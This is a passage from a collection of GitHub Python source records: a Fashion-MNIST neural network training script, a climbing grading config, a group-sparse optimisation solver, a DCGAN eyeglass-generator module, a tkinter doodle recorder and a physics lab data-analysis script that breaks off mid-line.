c incorporating signs of a,b,c :\"))\nquadratic(equation)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"piyush-daigavhane/ERC-ECS-Python-Question","sub_path":"question_2.py","file_name":"question_2.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13456796861","text":"import os\nimport requests\nimport zipfile\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nfrom nnObjs import *\n\ndef loadMNISTDataset(path):\n\n labels = os.listdir(path)\n X = []\n y = []\n print(\"Loading images...\")\n\n numFiles = 0\n for label in labels:\n files = os.listdir(path + \"/\" + label)\n numFiles += len(files)\n\n cumNum = 1\n for label in labels:\n files = os.listdir(path + \"/\" + label)\n for file in files:\n print(f\"Loading file {file} in label {label} in {path} PROGRESS: %{100*cumNum/numFiles:.3f}\")\n image = cv2.imread(path + \"/\" + label + \"/\" + file, cv2.IMREAD_UNCHANGED)\n X.append(image)\n y.append(label)\n cumNum += 1\n\n return np.array(X), np.array(y).astype(\"uint8\")\n\nURL = 'https://nnfs.io/datasets/fashion_mnist_images.zip'\nFILE = 'fashion_mnist_images.zip'\nFOLDER = \"fashionMNISTImages\"\n\n\n# prepare data\nif not os.path.isfile(FILE):\n\n print(f'Downloading {URL} and saving as {FILE}...')\n \n r = requests.get(URL)\n with open(FILE, \"wb\") as zipFile:\n zipFile.write(r.content)\n\nif not os.path.isdir(FOLDER):\n print(f'Unzipping to folder {FOLDER}...')\n\n with zipfile.ZipFile(FILE) as zipFile:\n zipFile.extractall(FOLDER)\n\n# display example data\nimageData = cv2.imread(FOLDER + \"/train/4/0011.png\", cv2.IMREAD_UNCHANGED)\nnp.set_printoptions(linewidth=200)\nplt. imshow (imageData, cmap=\"gray\")\nplt. show (block=False)\nplt. pause (3)\nplt. close ()\n\n#load train and test data\nX, y = loadMNISTDataset ( FOLDER + \"/train\" )\nXTest, yTest = loadMNISTDataset ( FOLDER + \"/test\" )\n\n#scale image data (0, 255) to (-1, 1)\nX = (X .astype(np.float32) - 255/2) / (255/2)\nXTest = (XTest.astype(np.float32) - 255/2) / (255/2)\n\n#reshape\nX = X. reshape(X. shape[0], -1)\nXTest = XTest. reshape(XTest. shape[0], -1)\nX = np.transpose(X)\nXTest = np.transpose(XTest)\n\n#shuffle\nindexes = np.array(range(X.shape[1]))\nnp.random.shuffle(indexes)\nX = X[:, indexes]\ny = y[indexes]\n\n# create model\nmodel1 = model()\n\nmodel1.addLayer(layerDense(64, X.shape[0]))\nmodel1.addLayer(actReLu())\nmodel1.addLayer(layerDense(64, 64))\nmodel1.addLayer(actReLu())\nmodel1.addLayer(layerDense(10, 64))\nmodel1.addLayer(actSoftmax())\n\nmodel1.set( loss = lossCatCrossEnt(), \n optimizer = optimizerAdam(decay=5e-5),\n accuracy=accuracyCategorical()\n )\n\nmodel1.establish()\n\nmodel1.train(X, y, numEpoch=5, batchSize=128, printEvery=100)\n\nmodel1.validate(XVal=XTest, yVal=yTest, batchSize=128)\n\nmodel1.plotEpoch()\n\nparams = model1.getParams()\n\nmodel1.saveParams(\"fashionMNIST.params\")\n\nmodel1.saveModel(\"fashionMNIST.model\")\n\n# CREATE NEW MODEL FROM TRAINED MODEL PARAMETERS\nmodel2 = model()\n\nmodel2.addLayer(layerDense(64, X.shape[0]))\nmodel2.addLayer(actReLu())\nmodel2.addLayer(layerDense(64, 64))\nmodel2.addLayer(actReLu())\nmodel2.addLayer(layerDense(10, 64)) \nmodel2.addLayer(actSoftmax())\n\nmodel2.set(loss=lossCatCrossEnt(), accuracy=accuracyCategorical())\n\nmodel2.establish()\n\nmodel2.loadParams(\"fashionMNIST.params\")\n\nmodel2.validate(XTest, yTest)\n\n# LOAD SAVED MODEL\nmodel3 = model.load(\"fashionMNIST.model\")\n\nmodel3.validate(XTest, yTest)\n\nconfidences = model3.predict(XTest, batchSize=2500)\npredictions = model3.outputLayerActivation.prediction(confidences)\n\n\n# USE MODEL3\nmodel3 = model.load(\"fashionMNIST.model\")\n\nfashionMNISTLabels = {\n 0: 'T-shirt/top',\n 1: 'Trouser',\n 2: 'Pullover',\n 3: 'Dress',\n 4: 'Coat',\n 5: 'Sandal',\n 6: 'Shirt',\n 7: 'Sneaker',\n 8: 'Bag',\n 9: 'Ankle boot'\n }\n\nimageData = cv2.imread(FOLDER + \"/test/4/0011.png\", cv2.IMREAD_GRAYSCALE)\nplt.figure()\nplt.imshow (imageData, cmap=\"gray\")\n\n#imageData = 255 - imageData\n#plt.figure()\n#plt.imshow (imageData, cmap=\"gray\")\n\nimageData = cv2.resize(imageData, (28, 28))\nplt.figure()\nplt.imshow (imageData, cmap=\"gray\")\n\nimageData = (imageData .astype(np.float32) - 255/2) / (255/2)\nimageData = imageData.reshape(1, -1)\nimageData = np.transpose(imageData)\n\n\nconfidences = model3.predict(imageData)\npredictions = model3.outputLayerActivation.prediction(confidences)\n\n#print(predictions)\n#print(predictions.shape)\n#print(predictions[0, 0])\n\nprediction = fashionMNISTLabels[predictions[0, 0]]\n\nprint(prediction)\n\nplt.show()","repo_name":"omerozy/appMLP","sub_path":"fashionMINST.py","file_name":"fashionMINST.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"42673717978","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# How much previous days count\nDECAY = 0.8\n\n# How much success in a higher grade counts for lower grades\n# and how much failure in lower grades counts for higher grades\nOTHER_GRADE_WEIGHT = 0.5\n\n# How much a partially completed route counts\nPARTIAL_ROUTE_WEIGHT = 0.5\n\n# Should we translate color names to English?\nENGLISH = False\n\n","repo_name":"samhocevar/climbing","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20397359916","text":"'''\nFile: solve.py\nAuthor: Yutong Dai (rothdyt@gmail.com)\nFile Created: 2020-02-23 10:51\nLast Modified: 2021-01-28 00:05\n--------------------------------------------\nDescription:\n'''\nimport sys\nimport os\nimport time\nimport numpy as np\nsys.path.append(\"../\")\nsys.path.append(\"../..\")\n\nimport src.solvers.FaRSAGroup.utils as utils\nfrom src.solvers.FaRSAGroup.params import *\nfrom src.solvers.FaRSAGroup.Algorithm import AlgoBase, set_prox_stepsize\nimport src.solvers.FaRSAGroup.printUtils as printUtils\n\n\ndef solve(f, r, X_initial=None, proxStepsize=None, method='gradient',\n update_proxStepsize='const', params=params, print_group=True, print_second_level=False,\n kappa_1=1e-2, kappa_2=1e-2, fraction=0.8, print_time=False, cg_backtrack_strategy=\"cutfrac\"):\n \"\"\"\n Solve the group l2 regualrized problem.\n\n Args:\n f: loss function object\n r: regularizer object\n X_intial(np.array): starting point\n proxStepsize(np.float64/np.array/None): \n If it is set to None, then one should call `set_prox_stepsize` to initialize the proxStepsize\n method: parameters for `set_prox_stepsize`.\n update_proxStepsize:\n 'const': use constant params['zeta']\n 'single': use only one proxStpesize for all groups; estimated by Lipschtiz constant\n 'block': each group has its own proxStepsize; at each iteration, working groups are updated with the same Lipschtiz constant estimation\n 'group': each group has its own proxStepsize; at each iteration, proxStepsize for each working groups are updated separately\n 'groupv': varinat of group and only allows to decrease proxstepsize\n update_kappa:\n 'chicg': update min(kappa, 1/2) as chicg suggests\n 'hack': update kappa as hack suggests\n params:\n a dictionary containing parameters for linesearch methods.\n force_cg: force one to try newton step with the unit stepsize\n \"\"\"\n # print out some key parameters\n if update_proxStepsize in ('single', 'const'):\n alpha_type = 'singlealpha'\n else:\n alpha_type = 'groupalpha'\n if proxStepsize is None:\n # proxStepsize = set_prox_stepsize(f, r, alpha_type, method)\n proxStepsize = np.min([set_prox_stepsize(f, r, alpha_type, method), 1])\n print('proxStepsize is [None]; Set up by {}'.format(method))\n else:\n print('proxStepsize is [{}]'.format(type(proxStepsize)))\n print(\"Update proxStepsize using {}\".format(update_proxStepsize))\n print(\"Print time per iteration: {}\".format(print_time))\n print(\"Termination tol:cg:{} | pg:{}\".format(\n params['tol_cg'], params['tol_pg']))\n print(\"maxtime:{} | maxiter:{}\".format(\n params['max_time'], params['max_iter']))\n print(\n f\"kappa1_max:{params['kappa1_max']:3.3e} | kappa2_max:{params['kappa2_max']:3.3e}\")\n print(\n f\"kappa1_min:{params['kappa1_min']:3.3e} | kappa2_min:{params['kappa2_min']:3.3e}\")\n print(\n f\"kappa_increase:{params['kappa_increase']} | kappa_decrease:{params['kappa_decrease']}\")\n print(f\"kappaStrategy: dynamic | count freq:{params['kappa_freq_count']}\")\n print(f\"Equipped with early termination\")\n # set up algorithms\n Ndata = f.n\n p = f.p\n K = r.K\n G_i_starts = r.starts\n G_i_ends = r.ends\n unique_groups = r.unique_groups\n problem_attribute = f.__str__()\n problem_attribute += \"Regularizer:{:.>44}\\n\".format(r.__str__())\n problem_attribute += \"Penalty Parameter:{:.>30}lambda={:3.4f}\\n\".format(\n '', r.penalty)\n problem_attribute += \"Number of groups:{:.>32}\\n\".format(K)\n problem_attribute += \"Update proxStepsize:{:.>35}\\n\".format(\n update_proxStepsize)\n algo = AlgoBase(f, r, proxStepsize, params, kappa_1, kappa_2)\n iteration_start = time.time()\n if X_initial is None:\n X = np.zeros([p, 1])\n else:\n X = X_initial\n fevals = gevals = HvProds = subitsT = 0\n info = {}\n if params['save_log']:\n outID = '{}'.format(params['tag'])\n else:\n outID = f.datasetName\n time_so_far = print_cost = 0\n if params['printlevel'] >= 1:\n utils.print_problem(problem_attribute, outID)\n # normX = utils.l2_norm(X)\n normX = np.sqrt(np.dot(X.T, X))[0][0]\n algo.fval = algo.f.evaluate_function_value(X)\n rval = algo.r.func(X)\n algo.F = algo.fval + rval\n fevals += 1\n gevals += 1\n iteration = 0\n time_update_proxStepszie = 0\n if Ndata < p:\n print('n=p, no fraction')\n prox_time = 0\n newton_time = 0\n pg_ls_time = 0\n cg_ls_time = 0\n pg_time = 0\n cg_time = 0\n consequtive_pg = 0\n if params[\"kappa_freq_count\"]:\n kappa_increase, kappa_decrease = 0, 0\n kappa_1_max, kappa_1_min = kappa_1, kappa_1\n kappa_2_max, kappa_2_min = kappa_2, kappa_2\n\n while True:\n # print('=============================')\n # print(\"Iteration:{}\".format(iteration))\n # if iteration == 9:\n # print(1)\n prox_time_iter = time.time()\n algo.proximal_step(X)\n # print(\"||s||:{}\".format(utils.l2_norm(algo.proximal)))\n prox_time_iter = time.time() - prox_time_iter\n prox_time += prox_time_iter\n # call set_cg first because the internal dependence issues.\n algo.set_cg()\n algo.set_pg()\n # print(f\"kappa_1:{algo.kappa_1:2.3e} | kappa_2:{algo.kappa_2:2.3e}\")\n gI_cg, nI_cg, gI_pg, nI_pg = len(algo.I_cg_group), np.sum(\n algo.I_cg_index), algo.K - len(algo.I_cg_group), np.sum(algo.I_pg_index)\n # if iteration in [95, 96]: # debug madelon to remove\n # # print(\"Iter:{} | old: {} | new: {}\".format(iteration, chicg_last_iteration, algo.chi_cg))\n # print(iteration)\n # print(utils.get_classification(algo.zeroGroup, algo.nonzeroGroup, algo.zeroProxGroup, algo.nonzeroProxGroup))\n iteration_end = time.time() - iteration_start - print_cost\n time_so_far += iteration_end\n\n if params['printlevel'] == 2:\n if iteration % params['printevery'] == 0:\n # utils.print_header(outID, print_time)\n printUtils.print_header(outID, print_time)\n res = utils.get_classification(\n algo.zeroGroup, algo.nonZeroGroup, algo.zeroProxGroup, algo.nonZeroProxGroup)\n nn, nz, zn, zz = len(\n res['NZ-NZ']), len(res['NZ-Z']), len(res['Z-NZ']), len(res['Z-Z'])\n # utils.print_iteration(iteration, algo.fval, normX, algo.F, algo.proxStepsize, algo.chi_cg, algo.chi_pg,\n # gI_cg, nI_cg, gI_pg, nI_pg, nn, nz, zn, zz, outID)\n printUtils.print_iteration(iteration, algo.fval, normX, algo.F, algo.proxStepsize, algo.kappa_1, algo.chi_cg, algo.chi_pg,\n gI_cg, nI_cg, gI_pg, nI_pg, nn, nz, zn, zz, outID)\n if iteration == 0:\n chi_cg_0 = algo.chi_cg\n chi_pg_0 = algo.chi_pg\n chi_cg_termination = params['tol_cg'] * max(1, chi_cg_0)\n chi_pg_termination = params['tol_pg'] * max(1, chi_pg_0)\n if (algo.chi_cg <= chi_cg_termination) and (algo.chi_pg <= chi_pg_termination):\n info['status'] = 0\n break\n if iteration >= params['max_iter']:\n info['status'] = 1\n break\n if time_so_far > params['max_time']:\n info['status'] = 2\n break\n iteration_start = time.time()\n\n if algo.chi_pg <= params['Gamma'] * algo.chi_cg:\n # choose the working groups\n cg_time_iter = time.time()\n if Ndata < p:\n algo.select_cg_frac(fraction)\n else:\n algo.select_cg()\n y = algo.cg_step(X, cg_backtrack_strategy)\n cg_time_iter = time.time() - cg_time_iter\n cg_time += cg_time_iter\n cg_ls_time += algo.ls_time_iter\n newton_time += algo.newton_time_iter\n HvProds += algo.subits\n fevals += algo.cg_feval\n if algo.status in [-1, 4]:\n info['status'] = algo.status\n if algo.status == -1:\n print(\"maxback cg:\", algo.cg_backtrack)\n utils.print_cg_step(algo.typeofIteration, algo.nI_cgs, algo.gradF_Icgs_norm, algo.subprobFlag, algo.subits,\n algo.res, algo.res_target, algo.normd, algo.cg_type, algo.newZB, algo.dirder,\n algo.projection_attempts, algo.cg_backtrack, algo.cg_stepsize,\n prox_time_iter, algo.newton_time_iter, algo.ls_time_iter, cg_time_iter,\n outID, print_time)\n break\n else:\n pg_time_iter = time.time()\n algo.select_pg()\n y = algo.pg_step(X)\n pg_time_iter = time.time() - pg_time_iter\n pg_time += pg_time_iter\n pg_ls_time += algo.ls_time_iter\n fevals += algo.pg_feval\n if algo.pg_flag == False:\n if update_proxStepsize == 'const':\n algo.proxStepsize *= algo.params['zeta']\n if algo.status == -1:\n info['status'] = algo.status\n print(\"maxback pg:\", algo.pg_backtrack)\n utils.print_pg_step(algo.typeofIteration, algo.nI_pgs, algo.subits, algo.normd,\n algo.pg_backtrack, algo.pg_stepsize,\n prox_time_iter, algo.ls_time_iter, pg_time_iter,\n outID, print_time)\n break\n if update_proxStepsize != 'const':\n time_update_proxStepszie_begin = time.time()\n if algo.typeofIteration == 'cg':\n algo.get_proxStepsize(\n X, y, algo.f_old, algo.fval, algo.d_use, algo.stepSize_use)\n else:\n algo.get_proxStepsize(\n X, y, algo.f_old, algo.fval, algo.d_use, algo.stepSize_use)\n algo.proxStepsize = algo.newProxStepsize\n time_update_proxStepszie_end = time.time()\n time_update_proxStepszie += time_update_proxStepszie_end - \\\n time_update_proxStepszie_begin\n\n subitsT += algo.subits\n temp = time.time()\n if params['printlevel'] == 2:\n if algo.typeofIteration == 'cg':\n utils.print_cg_step(algo.typeofIteration, algo.nI_cgs, algo.gradF_Icgs_norm, algo.subprobFlag, algo.subits,\n algo.res, algo.res_target, algo.normd, algo.cg_type, algo.newZB, algo.dirder,\n algo.projection_attempts, algo.cg_backtrack, algo.cg_stepsize,\n prox_time_iter, algo.newton_time_iter, algo.ls_time_iter, cg_time_iter,\n outID, print_time)\n else:\n utils.print_pg_step(algo.typeofIteration, algo.nI_pgs, algo.subits, algo.normd,\n algo.pg_backtrack, algo.pg_stepsize,\n prox_time_iter, algo.ls_time_iter, pg_time_iter,\n outID, print_time)\n if print_second_level:\n if len(algo.bar_I_cg_group) != 0:\n utils.print_more(algo.bar_I_cg_index, algo.bar_I_cg_group, algo.bar_chi_cg, algo.I_cg_index, algo.chi_cg,\n algo.norm_gradF_bar_I_cg, algo.group_X_norm, algo.group_gradF_norm,\n algo.small_radius_lst, algo.outter_radius_lst, algo.inner_radius_lst,\n algo.kappa_1, algo.kappa_2, algo.kappa_3, outID)\n else:\n utils.print_empty_bar_Icg(outID)\n print_cost = time.time() - temp\n X = y\n # this is need if update_proxStepsize is not const or single\n # algo.fval = algo.f.evaluate_function_value(X)\n # algo.F = algo.fval + algo.r.evaluate_function_value(X)\n # normX = utils.l2_norm(X)\n normX = np.sqrt(np.dot(X.T, X))[0][0]\n gevals += 1 # about to call gradient method in the next iteration\n iteration += 1\n if Ndata < p:\n if (iteration % 5 == 1) and (algo.typeofIteration == 'cg'):\n F_seq_switch.pop(0)\n F_seq_switch.append(algo.F)\n if np.abs(F_seq_switch[0] - F_seq_switch[1]) <= 1e-3:\n fraction = 1\n else:\n fraction = fraction_init\n if algo.typeofIteration == 'cg':\n consequtive_pg = 0\n # 6 - 1 = 5 total backtracks\n if algo.cg_backtrack + algo.projection_attempts > 6:\n # default: 1e3 make 10 also controlable # factor to increase and decrease (10, 1/10)\n algo.kappa_1 = min(\n algo.kappa_1 * params['kappa_increase'], params['kappa1_max'])\n algo.kappa_2 = min(\n algo.kappa_2 * params['kappa_increase'], params['kappa2_max'])\n if params[\"kappa_freq_count\"]:\n kappa_increase += 1\n kappa_1_max = max(algo.kappa_1, kappa_1_max)\n kappa_2_max = max(algo.kappa_2, kappa_2_max)\n else:\n consequtive_pg += 1\n if consequtive_pg > 5:\n # default: 1e-5\n algo.kappa_1 = max(\n algo.kappa_1 * params['kappa_decrease'], params['kappa1_min'])\n algo.kappa_2 = max(\n algo.kappa_2 * params['kappa_decrease'], params['kappa2_min'])\n if params[\"kappa_freq_count\"]:\n kappa_decrease += 1\n kappa_1_min = min(kappa_1_min, algo.kappa_1)\n kappa_2_min = min(kappa_2_min, algo.kappa_2)\n\n if params['printlevel'] == 2:\n utils.print_exit(info['status'], outID)\n nnz = utils.get_group_structure(\n X, K, unique_groups, G_i_starts, G_i_ends, epsilon=1e-8)\n info['n'] = algo.f.n\n info['p'] = algo.f.p\n info['Lambda'] = algo.r.penalty\n info['num_groups'] = algo.r.K\n info['nnz'] = nnz\n info['nz'] = algo.K - nnz\n info['F'] = algo.F\n info['normX'] = normX\n info['f'] = algo.fval\n info['chipg'] = algo.chi_pg\n info['chicg'] = algo.chi_cg\n info['fevals'] = fevals\n info['HvProds'] = HvProds\n info['time'] = time_so_far\n info['iteration'] = iteration\n info['num_pg_steps'] = algo.num_pg_steps\n info['num_cg0_stpes'] = algo.num_cg0_steps\n info['num_cgdesc_steps'] = algo.num_cgdesc_steps\n info['gevals'] = gevals\n info['subits'] = subitsT\n info['time_update_stepsize'] = time_update_proxStepszie\n info['X'] = X\n info['zeroGroup'] = algo.zeroGroup\n info['nonZeroGroup'] = algo.nonZeroGroup\n info['proxStepsize'] = algo.proxStepsize\n info['cg_time'] = cg_time\n info['newton_time'] = newton_time\n info['cg_ls_time'] = cg_ls_time\n info['pg_time'] = pg_time\n info['pg_ls_time'] = pg_ls_time\n info['prox_time'] = prox_time\n if params[\"kappa_freq_count\"]:\n info['kappa_increase'] = kappa_increase\n info['kappa_decrease'] = kappa_decrease\n info['kappa1_max'] = kappa_1_max\n info['kappa2_max'] = kappa_2_max\n info['kappa1_min'] = kappa_1_min\n info['kappa2_min'] = kappa_2_min\n if params['printlevel'] == 2 and info['status'] != -1 and print_group:\n utils.print_group_sparsity(\n X, K, unique_groups, G_i_starts, G_i_ends, outID, epsilon=1e-8)\n if params['printlevel'] == 2:\n utils.print_result(info, outID)\n return info\n","repo_name":"Yutong-Dai/S-PStorm","sub_path":"src/solvers/FaRSAGroup/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":15871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"30833876600","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom PIL import Image\n\nfrom networks import dcgan_utils\n\n\ndef build_model():\n \"\"\"\n Builds the generator part of the eye-glass generating DCGAN model.\n\n :return: the built generator model as tf.keras Sequential object (not compiled yet)\n \"\"\"\n inp = tf.keras.layers.InputLayer((25,)) # input layer\n fc = tf.keras.layers.Dense(7040) # fully connected layer\n reshape = tf.keras.layers.Reshape(target_shape=(4, 11, 160)) # reshape tensor\n # \"deconvolutional\" layers\n deconv1 = tf.keras.layers.Conv2DTranspose(80, (5, 5), strides=(2, 2), padding='same')\n deconv2 = tf.keras.layers.Conv2DTranspose(40, (5, 5), strides=(2, 2), padding='same')\n deconv3 = tf.keras.layers.Conv2DTranspose(20, (5, 5), strides=(2, 2), padding='same')\n deconv4 = tf.keras.layers.Conv2DTranspose(3, (5, 5), strides=(2, 2), padding='same', activation='tanh')\n\n model = tf.keras.models.Sequential(\n [\n inp,\n fc,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n reshape,\n deconv1,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n deconv2,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n deconv3,\n tf.keras.layers.BatchNormalization(),\n tf.keras.layers.ReLU(),\n deconv4\n ],\n name='Generator'\n )\n\n model.summary()\n\n return model\n\n\n# NOTE: start fresh training instead\n@DeprecationWarning\ndef load_gen_weights(gmodel):\n from deprecated import model_importer\n npas = model_importer.load_dcgan_mat_model_weights('../matlab-models/gen.mat')\n gmodel.layers[0].set_weights([npas[0], dcgan_utils.get_xavier_initialization((7040,))])\n gmodel.layers[4].set_weights([np.reshape(npas[3], (5, 5, 80, 160)), dcgan_utils.get_xavier_initialization((80,))])\n gmodel.layers[7].set_weights([np.reshape(npas[6], (5, 5, 40, 80)), dcgan_utils.get_xavier_initialization((40,))])\n gmodel.layers[10].set_weights([np.reshape(npas[9], (5, 5, 20, 40)), dcgan_utils.get_xavier_initialization((20,))])\n gmodel.layers[13].set_weights([np.reshape(npas[12], (5, 5, 3, 20)), dcgan_utils.get_xavier_initialization((3,))])\n\n return gmodel\n\n\ndef scale_gen_output(prediction):\n \"\"\"\n Scales the values of a NumPy array with original range [-1, 1] to range [0, 255].\n\n :param prediction: a numpy array with values ranging between -1 and 1\n :return: a numpy array with integer values between 0 and 255\n \"\"\"\n prediction += 1 # shift to range [0, 2]\n prediction *= 127.5 # scale to range [0, 255]\n prediction = np.round(prediction, 0)\n prediction = prediction.astype(int)\n\n return prediction\n\n\ndef save_gen_output_to_file(matrix):\n print(f'Saving image matrix of size {np.shape(matrix)}')\n matrix = np.asarray(matrix, dtype=np.uint8)\n img = Image.fromarray(matrix, 'RGB')\n\n # img.show()\n if not os.path.exists('../../out'):\n os.makedirs('../../out')\n img.save('../../out/generated_glass.png', 'PNG')\n","repo_name":"PhilK-7/agns-port","sub_path":"agns-py/src/networks/eyeglass_generator.py","file_name":"eyeglass_generator.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14444199013","text":"from PIL import ImageTk, Image, ImageDraw\nimport PIL\nfrom tkinter import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass DoodleInput():\n def __init__(self) -> None:\n width = 300 # canvas width\n height = 300 # canvas height\n center = height//2\n white = (255, 255, 255) # canvas back\n\n self.drawing_coords = []\n\n master = Tk()\n\n # create a tkinter canvas to draw on\n self.canvas = Canvas(master, width=width, height=height, bg='white')\n self.canvas.pack()\n\n # create an empty PIL image and draw object to draw on\n self.output_image = PIL.Image.new(\"RGB\", (width, height), white)\n self.draw = ImageDraw.Draw(self.output_image)\n self.canvas.pack(expand=YES, fill=BOTH)\n self.canvas.bind(\"\", self.paint)\n\n # add a button to save the image\n button=Button(text=\"save\",command=self.save)\n button.pack()\n\n master.mainloop()\n\n def save(self):\n coords = np.asarray(self.drawing_coords.copy())\n coords[:,1] = -coords[:,1] + 300\n np.savetxt('draw_coords.csv', coords, delimiter=\",\")\n self.plot(coords)\n # self.output_image.save(filename)\n\n def paint(self, event):\n x1, y1 = (event.x - 1), (event.y - 1)\n x2, y2 = (event.x + 1), (event.y + 1)\n self.drawing_coords.append((x1, y2))\n self.canvas.create_oval(x1, y1, x2, y2, fill=\"black\",width=5)\n self.draw.line([x1, y1, x2, y2],fill=\"black\",width=5)\n\n def plot(self, coords):\n plt.plot(coords[:,0], coords[:,1])\n plt.show()\n\n\nif __name__ == \"__main__\":\n di = DoodleInput()","repo_name":"edbatk/RobotSystems","sub_path":"ArmPi/Week 8/doodleInput.py","file_name":"doodleInput.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25721962054","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom IPython.display import display\nimport math\n\npd.options.mode.chained_assignment = None\n\n##################################\n# FUNCOES #\n##################################\n\n \ndef integrate(x, y, y0 = 0):\n yi = [y0]\n \n for i in range(1, min(len(x), len(y))):\n dy = ((y[i-1] + y[i]) / 2) * (x[i] - x[i-1])\n yi.append(yi[i-1] + dy)\n \n return yi\n\ndef derivate(x, y, y0 = 0):\n '''\n array, array, object -> array\n \n Recebe dois vetores com dados e retorna um vetor de mesmo tamanho, que seria o resultado da derivada de y em x.\n y0 é o valor inicial da derivada.\n '''\n yi = [y0]\n \n for i in range(1, min(len(x), len(y))):\n dy = y[i] - y[i-1]\n dx = x[i] - x[i-1]\n if dx == 0:\n yi.append(dy)\n else:\n yi.append(dy / dx)\n \n return yi\n\ndef frange(start, stop, step=1.0):\n \n i = start\n while i < stop:\n yield i\n i += step\n \ndef erro(df, dft1, dft2, x):\n e1 = []\n e2 = []\n \n for i in range(len(df)):\n j = math.floor(df['time'][i] * 1000)\n e1.append(df[x][i] - dft1[x][j])\n e2.append(df[x][i] - dft2[x][j])\n \n df[x + '_e1'] = e1\n df[x + '_e2'] = e2\n \ndef plot_experimentos(df, x, labels = '', units = '', exp = ''):\n h = len(x)\n fig, plots = plt.subplots(h, 5, sharex = 'col', sharey = 'row')\n fig.set_figwidth(20)\n fig.set_figheight(4 * h)\n fig.subplots_adjust(hspace = 0.05, wspace = 0, top = 0.93)\n fig.suptitle('Valores experimentais para os experimentos de ' + exp)\n fig.set_facecolor('#FFFFFF')\n for i in range(5):\n j = 0\n plots[j, i].scatter(df[i]['time'], df[i][x[j]], s = 1 if h == 3 else 10)\n plots[j, i].set_title('Experimento ' + str(i+1))\n \n if h == 3:\n j += 1\n plots[j, i].scatter(df[i]['time'], df[i][x[j]], s = 1)\n \n j += 1 \n plots[j, i].scatter(df[i]['time'], df[i][x[j]], s = 1 if h == 3 else 10)\n plots[j, i].set_xlabel('Tempo (s)')\n \n j = 0\n plots[j, 0].set_ylabel(labels[j] + ' (' + units[j] + ')')\n \n if h == 3:\n j += 1\n plots[j, 0].set_ylabel(labels[j] + ' (' + units[j] + ')')\n \n j += 1\n plots[j, 0].set_ylabel(labels[j] + ' (' + units[j] + ')')\n \n plt.show()\n \ndef plot_modelos(df, dft1, dft2, x, labels = '', units = '', exp = ''):\n def plot_modelo(plots, df, dft, x, i = 0, m = 1):\n i *= 2\n m -= 1\n plots[i, m].scatter(df['time'], df[x], s = 1)\n plots[i, m].plot(dft['time'], dft[x], color = 'C1')\n plots[i, m].set_xticklabels([])\n \n i += 1\n plots[i, m].set_xlabel('Tempo (s)')\n plots[i, m].scatter(df['time'], df[x + '_e' + str(m+1)], s = 1)\n plots[i, m].plot([0, max(df['time'])], [0, 0], '--', color = 'C1')\n \n h = len(x)\n \n fig, plots = plt.subplots(2 * h, 2, sharey = 'row')\n fig.set_figwidth(10)\n fig.set_figheight(8 * h)\n fig.subplots_adjust(wspace = 0, top = 0.93)\n fig.suptitle('Comparação dos resultados do método de Euler com o método\\nde Euler-Richardson para os experimentos de ' + exp)\n fig.set_facecolor('#FFFFFF')\n \n plots[0, 0].set_title('Método de Euler')\n plots[0, 1].set_title('Método de Euler-Richardson')\n for i in range(h):\n plot_modelo(plots, df, dft1, x[i], i = i, m = 1)\n plot_modelo(plots, df, dft2, x[i], i = i, m = 2)\n plots[2*i, 0].set_ylabel(labels[i] + ' (' + units[i] + ')')\n plots[2*i+1, 0].set_ylabel('Erro de ' + labels[i] + ' (' + units[i] + ')')\n \n \n \n\n##################################\n# DADOS #\n##################################\n#\n## 'CHUTE' = valores que esquecemos (Vitor, principalmente) de coletar, então estão estimados e podem precisar de ajustes\n#\n#\n## A plotagem dos gráficos não é definitiva e está aí mais pra visualizarmos e fazermos testes\n\n############ Constantes ###########\n\ng = 9.8 # aceleração da gravidade (m/s^2)\npar = 1.2 # densidade do ar (kg/m^3)\n\n########## Bloco em rampa #########\nthetar = 6 * math.pi / 180 # inclinacao (rad)\nD = 3.64 # distância percorrida (m)\nmr = 0.34 # massa do bloco (g)\nAr = 0.008 # área frontal do bloco (m^2)\nr = [] # lista para armazenar os dados do acelerometro\n\nfor i in range(5):\n # lendo dados do acelerometro\n r.append(pd.read_csv('r' + str(i+1) + '.csv'))\n \n\n############### MCU ###############\nR = 2.1 # raio (m)\nt = pd.read_csv('mcu.csv') # tabela com os dados dos tempos das voltas\nc = [] # lista para armazenar os tempos medidos pra cada experimento\n\nfor i in range(5):\n c.append(t.loc[t['rep'] == i+1])\n c[i] = c[i].reset_index()\n c[i] = c[i].filter(items=['time', 'theta'])\n\n############# Pêndulo #############\nl = 0.823 # comprimento das cordas (m)\na = 0.051 # largura do cesto (m)\nb = 0.144 # comprimento do cesto (m)\nL = math.sqrt(l**2 - (a/2)**2 - (b/2)**2) # comprimento da corda imaginária do pêndulo (m)\nmp = 0.23 # massa do pendulo (kg)\nAp = 0.0059 # área frontal do pêndulo (m^2)\np = [] # lista para armazenar os dados do giroscópio\ntmin_p = [7.05, 5.15, 5.2, 5.15, 5.3] # tempos iniciais (s)\ntheta0 = [] # inclinação inicial\n\nfor i in range(5):\n # lendo dados do giroscópio\n p.append(pd.read_csv('p' + 